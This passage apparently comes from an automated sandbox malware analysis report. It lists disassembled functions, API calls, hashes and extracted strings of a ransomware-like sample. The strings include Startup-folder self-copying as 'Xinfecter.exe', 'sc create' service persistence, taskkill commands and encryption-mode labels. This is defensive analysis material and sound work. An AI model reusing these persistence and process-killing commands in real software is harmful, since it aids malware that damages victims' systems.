                                      • Opcode Fuzzy Hash: 069e78711299a6452f6ddc996f2261258309ff6267bc8c6057729f458811478d
                                      • Instruction Fuzzy Hash: 5B21D371B5D614DBD720DF98DC01F9AB3A8E7C8B90F06026AE80997390F7719880C691
                                      Function 008DCA4C Relevance: 61.8, APIs: 5, Strings: 30, Instructions: 509fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1120 8dca4c 1121 8dca51-8dcaf9 call 8e98b0 * 3 1120->1121 1122 8dca4c call 8d83e0 1120->1122 1132 8dcaff-8dcb13 1121->1132 1133 8dcbf2-8dcc1e call 8b87e0 call 8e1b90 1121->1133 1122->1121 1135 8dcb15-8dcb18 1132->1135 1136 8dcb52-8dcb55 1132->1136 1150 8dcc24-8dccdb call 8e1b90 * 2 call 8e1b30 call 8e9850 call 8e9d90 call 8e2290 * 2 call 8e1e30 call 8b87e0 call 8e2290 * 2 1133->1150 1151 8dcce0-8dd022 call 8c3030 GetModuleFileNameW call 8e1a30 call 8c3eb0 call 8c3d50 call 8e19a0 call 8b49c0 call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 8e1860 * 2 CopyFileW call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 8e1860 * 2 CopyFileW call 8e1870 call 8e1890 call 8eace0 call 8e9750 call 8e9d90 call 8e2290 call 8e9750 call 8e9d90 call 8e2290 call 8e1e30 call 8b87e0 call 8e2290 call 8e1e30 call 8b87e0 call 8e2290 call 8e1870 call 8e1890 call 8eace0 call 8e9750 call 8e9d90 call 8e2290 call 8e1e30 call 8b87e0 call 8e2290 call 8d45a0 call 8b87e0 call 8e1b90 call 8e1aa0 call 8c38c0 1133->1151 1137 8dcb20-8dcb2a 1135->1137 1138 8dcb57-8dcb5a 1136->1138 1139 8dcb92-8dcb95 1136->1139 1137->1137 1142 8dcb2c-8dcb4d 1137->1142 1143 8dcb60-8dcb6a 1138->1143 1144 8dcbcd-8dcbec SetErrorMode SetConsoleTitleW call 8c60a0 1139->1144 1145 8dcb97-8dcb9a 1139->1145 1142->1136 1143->1143 1147 8dcb6c-8dcb8d 1143->1147 1144->1133 1156 8ded55-8ded72 call 940dbb 1144->1156 1148 8dcba0-8dcbaa 1145->1148 1147->1139 1148->1148 1152 8dcbac-8dcbc9 1148->1152 1150->1151 1276 8dd024-8dd02b 1151->1276 1277 8dd086-8dd09b call 8c6550 * 2 1151->1277 1152->1144 1276->1277 1279 8dd02d-8dd034 1276->1279 1287 8dd09d-8dd0bc call 8c6550 * 2 1277->1287 1288 8dd0c2-8dd1d2 call 8e1870 call 8e1890 call 8eace0 call 8e2260 call 8b8ae0 call 8e19a0 call 8b49c0 call 8e1870 call 8e1890 call 8eace0 call 8b8ae0 call 8ea5a0 call 8e19a0 call 8b49c0 * 2 call 8c4cc0 call 8e1a80 1277->1288 1279->1277 1281 8dd036-8dd042 call 8eb7b0 1279->1281 1281->1277 1286 8dd044-8dd083 call 8e1aa0 * 2 call 8b9300 1281->1286 1286->1277 1287->1288 1333 8dd1d4-8dd1d6 1288->1333 1334 8dd1dc-8dd29a call 8ea350 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 3 call 8e1aa0 call 8b4a20 call 8b49c0 1333->1334 1335 8dd2a8-8dd2e5 call 8e1aa0 call 8b4a20 call 8b49c0 1333->1335 1334->1335 1403 8dd29c-8dd2a3 1334->1403 1348 8dd2e7-8dd35d call 8ea350 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 3 1335->1348 1349 8dd362-8dd385 call 8ea350 1335->1349 1348->1349 1357 8dd38c-8dd3c0 call 8e1aa0 call 8b4a20 1349->1357 1358 8dd387 call 8d1770 1349->1358 1375 8dd402 1357->1375 1376 8dd3c2-8dd400 call 8e1aa0 call 8b4a20 1357->1376 1358->1357 1378 8dd409-8dd411 1375->1378 1376->1375 1376->1378 1382 8dd42d-8dd44f call 8b49c0 1378->1382 1383 8dd413-8dd427 call 8b49c0 1378->1383 1397 8dd7fb-8dd9c1 call 959190 call 8e3fc0 call 8e9940 call 8b3730 call 8e3f40 call 959190 call 8c6650 call 8f6480 call 959190 call 8ded80 call 959190 call 8def20 call 8e0a00 call 8f2d90 call 8e0a00 call 8f2bc0 1382->1397 1398 8dd455-8dd492 call 8e1aa0 call 8b4a20 call 8b49c0 1382->1398 1383->1382 1473 8dd9c7-8dd9d0 1397->1473 1415 8dd494-8dd4a1 call 8e1970 1398->1415 1416 8dd4a6-8dd4ac 1398->1416 1403->1333 1415->1416 1417 8dd4b0-8dd4cb call 8e1aa0 call 8baf30 1416->1417 1429 8dd4dd-8dd7f6 call 959190 call 8e4310 call 8e1490 call 8eb640 call 8e42a0 call 8e23a0 * 2 call 8e1bd0 * 2 call 8e1b30 call 8e22e0 call 8e2290 call 8e1b30 call 8e22e0 call 8e2290 call 8e1b90 * 2 call 8e1b30 call 8e1e90 call 8e1eb0 call 8eadc0 call 8e1940 call 8e1970 call 8e1b90 * 2 call 8e1b30 call 8e1e90 call 8e1eb0 call 8eadc0 call 8e1970 call 8b7fe0 call 8e22e0 call 8e2290 call 8e2230 call 8e2260 call 8e2290 call 8b49c0 call 8e2290 call 8b49c0 call 8e2290 * 4 call 8bace0 1417->1429 1430 8dd4cd 1417->1430 1609 8ddffe-8de061 call 959190 call 8b76c0 call 8f23a0 call 8e1a30 call 8e1660 1429->1609 1432 8dd4cf-8dd4d2 1430->1432 1433 8dd4d4-8dd4db Sleep 1430->1433 1432->1429 1432->1433 1433->1417 1473->1473 1475 8dd9d2-8dda3e call 8b7e30 call 8e22e0 call 8e2290 call 8e1b30 * 2 1473->1475 1497 8dda40-8dda49 1475->1497 1497->1497 1499 8dda4b-8dda61 call 8e2260 1497->1499 1505 8dda67-8dda70 1499->1505 1505->1505 1507 8dda72-8dda91 call 8c46c0 1505->1507 1514 8dda96-8dda9f 1507->1514 1514->1514 1516 8ddaa1-8ddada call 8e9de0 call 8e22e0 call 8e2290 1514->1516 1529 8ddae0-8ddae9 1516->1529 1529->1529 1531 8ddaeb-8ddff5 call 8e2410 call 8b7e30 call 8e22e0 call 8e2290 call 959190 call 8e3fc0 call 8e9750 call 8e9d90 call 8e9c80 call 8b3730 call 8e2290 * 2 call 8e3f40 call 8e1870 call 8e1890 call 8eace0 call 959190 call 8e3fc0 call 8e9ca0 call 8e9c80 call 8e2290 call 8e9ca0 call 8e9c80 call 8e2290 call 8e3f40 call 8e2410 call 8c4e20 call 8ea350 call 8ea420 call 8ea2e0 call 8b49c0 * 2 call 959190 call 8e4310 call 8b3730 call 8e42a0 call 8e1aa0 call 8d2460 call 8bace0 call 8b49c0 call 8e2290 * 2 call 8bb0a0 call 8e2290 call 8bb0a0 call 8e2290 * 5 call 8b7d70 call 8c6810 * 2 1529->1531 1531->1609 1753 8ddff9 call 8bb0a0 1531->1753 1632 8de073-8de379 call 8ea5f0 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 10 call 8e23a0 call 8e1e30 call 965a92 call 8e23a0 call 8e1e30 call 965a92 call 8ea5f0 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8e19a0 call 8b49c0 * 8 call 8e98b0 1609->1632 1633 8de063-8de06e call 8e1940 1609->1633 1785 8de37f-8de390 call 8bf630 1632->1785 1786 8de4e7-8de4f8 call 8e98b0 1632->1786 1633->1632 1753->1609 1793 8dec74-8ded50 call 8b87e0 call 8e2290 * 3 call 8b49c0 call 8b78d0 call 8b49c0 * 2 call 8e2290 * 8 call 8b49c0 * 3 call 8e2290 1785->1793 1794 8de396-8de487 call 8ea350 call 8ea420 call 8ea2e0 call 8ea420 call 8ea2e0 call 8ea420 call 8b49c0 * 5 call 8e1860 * 2 call 9661d6 1785->1794 1791 8de4fe-8de873 call 8b5130 * 2 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 1786->1791 1792 8dec20-8dec31 call 8e98b0 1786->1792 1983 8de879-8debff call 8b5130 * 2 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8e1600 call 8e1aa0 call 8eaf60 call 8eb150 call 8b5330 call 8b5240 * 2 1791->1983 1984 8dec04-8dec1e call 8b5240 * 2 1791->1984 1804 8dec61-8dec6d call 8cfd50 1792->1804 1805 8dec33-8dec48 call 8ce2e0 * 2 1792->1805 1793->1156 1898 8de489-8de4d0 call 8ea480 call 8e19a0 call 8b49c0 call 8e1860 * 2 call 9661d6 1794->1898 1899 8de4d3-8de4e2 call 8b49c0 1794->1899 1804->1793 1821 8dec6f 1804->1821 1805->1793 1831 8dec4a-8dec5f call 8ce2e0 * 2 1805->1831 1821->1793 1826 8dec6f call 8cfd50 1821->1826 1826->1793 1831->1793 1898->1899 1899->1793 1983->1984 1984->1793
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008DCBCF
                                      • SetConsoleTitleW.KERNEL32(asykat), ref: 008DCBDA
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,dcdcf,00000000), ref: 008DCCF3
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000,00989F4D,000000FF), ref: 008DCDB3
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 008DCE2D
                                        • Part of subcall function 008D45A0: GetCurrentThread.KERNEL32 ref: 008D45E3
                                        • Part of subcall function 008D45A0: OpenThreadToken.ADVAPI32(00000000), ref: 008D45EA
                                        • Part of subcall function 008D45A0: GetLastError.KERNEL32 ref: 008D45F4
                                        • Part of subcall function 008D45A0: GetCurrentProcess.KERNEL32(0000000A,?), ref: 008D460B
                                        • Part of subcall function 008D45A0: OpenProcessToken.ADVAPI32(00000000), ref: 008D4612
                                        • Part of subcall function 008D45A0: DuplicateToken.ADVAPI32(?,00000002,?), ref: 008D4629
                                        • Part of subcall function 008D45A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D4654
                                        • Part of subcall function 008D45A0: LocalAlloc.KERNEL32(00000040,00000014), ref: 008D4666
                                        • Part of subcall function 008D45A0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 008D467A
                                        • Part of subcall function 008D45A0: GetLengthSid.ADVAPI32(?), ref: 008D468B
                                        • Part of subcall function 008D45A0: LocalAlloc.KERNEL32(00000040,00000010), ref: 008D4697
                                        • Part of subcall function 008D45A0: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 008D46AC
                                        • Part of subcall function 008D45A0: AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 008D46C4
                                        • Part of subcall function 008D45A0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 008D46DC
                                        • Part of subcall function 008C6550: GlobalMemoryStatusEx.KERNEL32(BA3649C5), ref: 008C656F
                                        • Part of subcall function 008C4CC0: NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,BA3649C5), ref: 008C4D25
                                        • Part of subcall function 008C4CC0: NetApiBufferFree.NETAPI32(00000000), ref: 008C4DC6
                                        • Part of subcall function 008C4CC0: NetApiBufferFree.NETAPI32(00000000), ref: 008C4DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FileInitializeToken$AllocBufferCopyCurrentDescriptorErrorFreeLocalOpenProcessSecurityThread$AccessAllocateAllowedConsoleDaclDuplicateEnumGlobalLastLengthMemoryModeModuleNameStatusTitleUser
                                      • String ID: /f$" start= auto$" start=auto$","$"cmd.exe","$$$$$.1UI$77H75$:\Documents and Settings\$:\Users\$Dflt$Fast$Fast$Manual_Mini_Config$Mini_Config$Version 5.$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$asykat$asykat$c:\R_cfg.ini$dcdcf$k2ba8v$r1d8la$sc create SqlBakup binPath= "$taskkill /PID $tasklist /v /fo csv | findstr /i "dcdcf"$ver
                                      • API String ID: 2029459818-482096149
                                      • Opcode ID: a2a012f65daf249f4f57b12fdc2aa6ad96378fccf6dfcc5ab83aed7c25d5c888
                                      • Instruction ID: 4dadac689781585f4bfb1d84209d326eb9f75381c1fa1b736212b0d916da5694
                                      • Opcode Fuzzy Hash: a2a012f65daf249f4f57b12fdc2aa6ad96378fccf6dfcc5ab83aed7c25d5c888
                                      • Instruction Fuzzy Hash: 8F22D6309012589ACB24EB68CC56BEDB7B4FF56304F0041E9E409E7292EB705F89CB53
                                      Function 008D2460 Relevance: 51.0, APIs: 4, Strings: 24, Instructions: 1975COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 008C60E0: PathIsNetworkPathA.SHLWAPI(?,009AAB14,?,?,?,BA3649C5), ref: 008C6167
                                        • Part of subcall function 008C60E0: __alloca_probe_16.LIBCMT ref: 008C6197
                                        • Part of subcall function 008C60E0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,BA3649C5), ref: 008C61B1
                                        • Part of subcall function 008C60E0: GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,BA3649C5), ref: 008C61CC
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D24F7
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D2505
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D2539
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D2547
                                        • Part of subcall function 008C4080: GetComputerNameExW.KERNEL32(00000000,?,?,BA3649C5,?), ref: 008C4101
                                        • Part of subcall function 008C4080: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 008C41A0
                                        • Part of subcall function 008BAE70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BAEE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Path$ByteCharComputerDiskDomainFreeInformationIos_base_dtorMultiNameNetworkPrimaryRoleSpaceWide__alloca_probe_16std::ios_base::_
                                      • String ID: | $ ~$,d5$77H75$77H75$:\Users\$Microsoft$\AppData\S-inf.sys$_And_Netword_Drive_Size:$_Encryption_Mode:$_Fast_Mode$_Slow_Mode$___$api.ipify.org$echo %date%-%time%$f$hg3l,$n7t0$o8g9n$p2h6$s4e5y$systeminfo|find /i "original"$systeminfo|find /i "os name"$ver
                                      • API String ID: 586396178-4214318300
                                      • Opcode ID: 992a9bc938fa2062cf546e90385e4a994903bed7a03b9af6ea5cde02a92ada1b
                                      • Instruction ID: d7c6f4c6e7bb24c0ff8f6a2450c8447cff5da76d7b5a1bad5128919a7b3bac60
                                      • Opcode Fuzzy Hash: 992a9bc938fa2062cf546e90385e4a994903bed7a03b9af6ea5cde02a92ada1b
                                      • Instruction Fuzzy Hash: E9139E70D102988BEB24DB28CD55BEDBBB5FF91304F5082D9D048A7292DB755B88CF92
                                      Function 009780DC Relevance: 34.7, APIs: 23, Instructions: 194processsynchronizationCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3691 9780dc-9780e8 3692 978102-978106 3691->3692 3693 9780ea-9780fd call 9661c3 call 965932 3691->3693 3692->3693 3695 978108-97810c 3692->3695 3705 9782f6-9782f9 3693->3705 3697 97810e-978116 call 9661b0 3695->3697 3698 978118-97813d call 982bd3 3695->3698 3697->3693 3706 978156-97818e call 977e99 3698->3706 3707 97813f-978154 call 975565 * 2 3698->3707 3712 978190-9781ae call 975565 * 3 3706->3712 3713 9781b8-9781bf 3706->3713 3719 9781b1-9781b3 3707->3719 3712->3719 3717 9781c4-978215 call 9661b0 call 959190 CreateProcessA 3713->3717 3718 9781c1-9781c3 3713->3718 3729 978217-978226 GetLastError call 96618d 3717->3729 3730 97823c-978242 3717->3730 3718->3717 3724 9782f4-9782f5 3719->3724 3724->3705 3741 97822f-978231 3729->3741 3742 978228-978229 CloseHandle 3729->3742 3733 9782fa-978301 call 9617a5 3730->3733 3734 978248-97824a 3730->3734 3737 978282-978285 3734->3737 3738 97824c-978269 WaitForSingleObject GetExitCodeProcess 3734->3738 3739 978287-978289 3737->3739 3740 9782c3-9782c5 3737->3740 3744 978272-978274 3738->3744 3745 97826b-97826c CloseHandle 3738->3745 3746 978292-978294 3739->3746 3747 97828b-97828c CloseHandle 3739->3747 3750 9782c7-9782c8 CloseHandle 3740->3750 3751 9782ce-9782ee call 975565 * 3 3740->3751 3748 978233-97823a CloseHandle 3741->3748 3749 97829f-9782c1 call 975565 * 3 3741->3749 3742->3741 3752 978276-978277 CloseHandle 3744->3752 3753 97827d-978280 3744->3753 3745->3744 3755 978296-978297 CloseHandle 3746->3755 3756 97829d 3746->3756 3747->3746 3748->3749 3768 9782f0-9782f3 3749->3768 3750->3751 3751->3768 3752->3753 3753->3749 3755->3756 3756->3749 3768->3724
                                      APIs
                                        • Part of subcall function 00982BD3: _free.LIBCMT ref: 00982BF5
                                      • _free.LIBCMT ref: 0097814D
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000), ref: 00978207
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00978217
                                      • __dosmaperr.LIBCMT ref: 0097821E
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978229
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978234
                                      • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 0097824E
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0097825B
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0097826C
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978277
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0097828C
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978297
                                      • _free.LIBCMT ref: 009782A2
                                      • _free.LIBCMT ref: 009782AE
                                      • _free.LIBCMT ref: 009782BA
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 009782C8
                                      • _free.LIBCMT ref: 00978142
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 00978193
                                      • _free.LIBCMT ref: 0097819E
                                      • _free.LIBCMT ref: 009781A9
                                      • _free.LIBCMT ref: 009782D1
                                      • _free.LIBCMT ref: 009782DD
                                      • _free.LIBCMT ref: 009782E9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                      • String ID:
                                      • API String ID: 4143445633-0
                                      • Opcode ID: 7144c3be9780338d0dbac16eedbe43eb6fd9ed01b5c49b23c8fbc779d5041ab7
                                      • Instruction ID: 7c5ae061877b669c7f909ac4a95c3789f50c827cbc3ccdfd59c1661b94ed63bf
                                      • Opcode Fuzzy Hash: 7144c3be9780338d0dbac16eedbe43eb6fd9ed01b5c49b23c8fbc779d5041ab7
                                      • Instruction Fuzzy Hash: D161BC72C44608EFDF11AFA4CC89AEEBB79EF44355F208526F828B2111DB314A44CB61
                                      Function 008C38C0 Relevance: 28.3, APIs: 14, Strings: 2, Instructions: 349COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3769 8c38c0-8c393f call 8ea350 3772 8c3942-8c394b 3769->3772 3772->3772 3773 8c394d-8c3964 call 8e7430 3772->3773 3776 8c3967-8c3970 3773->3776 3776->3776 3777 8c3972-8c3a04 call 8e88e0 * 2 3776->3777 3782 8c3a38-8c3a56 3777->3782 3783 8c3a06-8c3a18 3777->3783 3784 8c3a8d-8c3acb 3782->3784 3785 8c3a58-8c3a6d 3782->3785 3786 8c3a2e-8c3a35 call 94143c 3783->3786 3787 8c3a1a-8c3a28 3783->3787 3792 8c3ad0-8c3ad9 3784->3792 3790 8c3a6f-8c3a7d 3785->3790 3791 8c3a83-8c3a8a call 94143c 3785->3791 3786->3782 3787->3786 3789 8c3d38 call 965942 3787->3789 3799 8c3d3d call 965942 3789->3799 3790->3789 3790->3791 3791->3784 3792->3792 3795 8c3adb-8c3b2f call 8e7430 call 8e88e0 3792->3795 3806 8c3b66-8c3b80 GetFileAttributesW 3795->3806 3807 8c3b31-8c3b46 3795->3807 3802 8c3d42-8c3d47 call 965942 3799->3802 3811 8c3bc0-8c3bca GetFileAttributesW 3806->3811 3812 8c3b82-8c3b93 CreateDirectoryW 3806->3812 3809 8c3b5c-8c3b63 call 94143c 3807->3809 3810 8c3b48-8c3b56 3807->3810 3809->3806 3810->3799 3810->3809 3816 8c3bcc-8c3bd7 CreateDirectoryW 3811->3816 3817 8c3c01-8c3c07 3811->3817 3814 8c3b9c-8c3ba1 CreateDirectoryW 3812->3814 3815 8c3b95-8c3b9a CreateDirectoryW 3812->3815 3821 8c3bb6-8c3bbe CreateDirectoryW 3814->3821 3822 8c3ba3-8c3bb4 CreateDirectoryW * 3 3814->3822 3815->3814 3823 8c3bd9-8c3be8 CreateDirectoryW * 2 3816->3823 3824 8c3bea 3816->3824 3818 8c3c09-8c3c1b 3817->3818 3819 8c3c3b-8c3c55 3817->3819 3825 8c3c1d-8c3c2b 3818->3825 3826 8c3c31-8c3c38 call 94143c 3818->3826 3827 8c3c89-8c3ca3 3819->3827 3828 8c3c57-8c3c69 3819->3828 3821->3817 3822->3817 3829 8c3bf0-8c3bfa GetFileAttributesW 3823->3829 3824->3829 3825->3802 3825->3826 3826->3819 3834 8c3ca5-8c3cb7 3827->3834 3835 8c3cd3-8c3ced 3827->3835 3832 8c3c7f-8c3c86 call 94143c 3828->3832 3833 8c3c6b-8c3c79 3828->3833 3829->3817 3830 8c3bfc-8c3bff CreateDirectoryW 3829->3830 3830->3817 3832->3827 3833->3802 3833->3832 3840 8c3cc9-8c3cd0 call 94143c 3834->3840 3841 8c3cb9-8c3cc7 3834->3841 3836 8c3d1d-8c3d37 call 940dbb 3835->3836 3837 8c3cef-8c3d01 3835->3837 3843 8c3d13-8c3d1a call 94143c 3837->3843 3844 8c3d03-8c3d11 3837->3844 3840->3835 3841->3802 3841->3840 3843->3836 3844->3802 3844->3843
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,AppData\,00000008,?,?,009AB058,00000001,?,?,?,?,00000000), ref: 008C3B77
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3B8D
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3B98
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3B9D
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BA5
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BAD
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BB2
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BBC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                      • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CreateDirectory$AttributesFile
                                      • String ID: :\Users\$AppData\
                                      • API String ID: 689033430-659903382
                                      • Opcode ID: ecb9212ff88e597066b9fd740433c9d3e94a9af007453c4baf20bc13da0b1160
                                      • Instruction ID: ca7d6c7228cd3d2b0b4b5226cd669293f06e35a0ac41fb2ee30767f54ba6d8c7
                                      • Opcode Fuzzy Hash: ecb9212ff88e597066b9fd740433c9d3e94a9af007453c4baf20bc13da0b1160
                                      • Instruction Fuzzy Hash: 71D1D131A10258DBDB14DF68CC45FADBB72FF85314F20825DE409AB2A1D775AB86CB90
                                      Function 00965042 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 228COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
